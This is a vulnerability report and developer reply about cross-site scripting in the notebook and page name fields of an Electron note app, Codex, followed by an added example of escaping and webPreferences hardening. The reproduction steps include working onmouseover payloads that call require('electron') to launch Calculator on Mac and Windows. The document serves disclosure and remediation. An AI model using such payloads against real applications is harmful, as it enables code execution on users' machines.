Cross-site scripting (XSS) on Codex Notebook/Page name leads to code execution.
Reproduction
Open Codex
Create new Notebook
Insert payload on the Notebook (or page) name field
On Mac
<a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>
On Windows
<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>
Once you move your mouse over the link "test", Calculator will be opened.
Mitigation
Disable nodeIntegration
Thank you very much for letting me know about this. I've made it so that it sanitizes/escapes the notebook's name/icon text and page's name.
About disabling nodeIntegration, I'm going to do a project rewrite soon that will make the main/renderer processes interact the way they're supposed to do securely, and that'll include disabling nodeIntegration. But I just wanted to get this fix out quickly and that rewrite is gonna take a while.
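The two mitigations discussed in this thread (escaping the notebook/page name, and disabling nodeIntegration) sketched as an added example; it is not Codex's code. The function names, the `<li>` markup and the sample values are assumptions made for illustration.

```javascript
// Added example, not Codex's code. All names below are hypothetical.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the characters that let a string leave an HTML text or attribute
// context, so a notebook/page name is displayed as literal text.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical sidebar renderer: the name is escaped before it reaches markup.
function renderNotebookItem(name) {
  return `<li class="notebook">${escapeHtml(name)}</li>`;
}

// Review an Electron BrowserWindow `webPreferences` object for explicit
// settings that give injected renderer markup access to Node.js.
function auditWebPreferences(prefs = {}) {
  const findings = [];
  if (prefs.nodeIntegration === true) {
    findings.push('nodeIntegration: true exposes require() to page scripts');
  }
  if (prefs.contextIsolation === false) {
    findings.push('contextIsolation: false shares the preload scope with page scripts');
  }
  if (prefs.sandbox === false) {
    findings.push('sandbox: false runs the renderer without the Chromium sandbox');
  }
  return findings;
}

// Constructed name in the shape of the report above (handler shortened).
const sampleName = `<a href=x onmouseover="require('electron')">test</a>`;

// Constructed settings: the risky form next to the hardened form.
const riskyPrefs = { nodeIntegration: true, contextIsolation: false };
const hardenedPrefs = { nodeIntegration: false, contextIsolation: true, sandbox: true };

console.log(renderNotebookItem(sampleName));
console.log(auditWebPreferences(riskyPrefs));
console.log(auditWebPreferences(hardenedPrefs));
```

Escaping addresses this one injection point, while the `webPreferences` settings limit what any future injection in the renderer can reach.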